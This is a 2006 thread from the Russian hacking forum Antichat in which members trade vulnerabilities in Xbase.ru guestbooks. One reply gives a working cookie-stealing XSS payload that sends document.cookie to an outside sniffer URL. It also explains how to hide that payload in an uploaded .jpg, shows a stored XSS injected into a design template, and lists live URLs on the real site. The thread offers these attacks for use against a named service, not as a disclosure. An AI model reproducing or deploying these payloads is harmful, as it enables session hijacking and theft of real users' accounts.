ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Xbase
  #1  
Старый 16.12.2006, 09:26
Аватар для volone
volone
Новичок
Регистрация: 06.06.2006
Сообщений: 24
Провел на форуме:
64563

Репутация: 11
Отправить сообщение для volone с помощью ICQ
Question Xbase

кто-нибудь находил уязвимости в гостевых книгах от Xbase.ru ?
 
Ответить с цитированием

  #2  
Старый 16.12.2006, 13:04
Аватар для DIAgen
DIAgen
Познавший АНТИЧАТ
Регистрация: 02.05.2006
Сообщений: 1,191
Провел на форуме:
7364332

Репутация: 1276


По умолчанию

Цитата:
Сообщение от volone  
кто-нибудь находил уязвимости в гостевых книгах от Xbase.ru ?
Так бегло пробежался по Xbase.ru, не чего хорошего нету, только раскрытие пути _http://xbase.ru/inc/main.php
Если будет время можно будет глянуть получше
 
Ответить с цитированием

  #3  
Старый 16.12.2006, 13:07
Аватар для InferNo23
InferNo23
Участник форума
Регистрация: 05.09.2006
Сообщений: 187
Провел на форуме:
6860213

Репутация: 378
По умолчанию

При регистрации Поля: Имя, УРЛ, Фамилия уязвимы... но вставить туда снифер не получится, 20 букв ограничение..
Еше ношёл, что в меню "Загрузка графики" можно создать файл 213.jpg и вписать туда
Код:
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
потом загрузить на сайт, фильтрации на содержимое картинки вообще нет. потом просто кидаем линк на картинку и куки идут на снифер, то есть это пасивная xss. но это только для ИЕ

Полазил еше не много и нашол активную xss:
В меню "Настройка дизайна", дописываем в конец шаблона
Код:
<script>alert()</script>
, теперь заходим в свою гостевую и видем алерт.

ставим ковычку в сессию и смотрим исходный путь...


Алерт:
http://xbase.ru/index.php?nokia1

И картинка которая сворует куки:
http://borz.ru/pers/9b/nokia1/12.jpg

Последний раз редактировалось InferNo23; 16.12.2006 в 13:22.. Причина: исх. путь.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Конкурс. Егорыч+++ PHP, PERL, MySQL, JavaScript 74 07.01.2006 04:47
Чё можно сделать с исходниками (как я понял) гостевых - xBASE ЗеЛёнЫй Чаты 0 20.02.2005 14:33



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ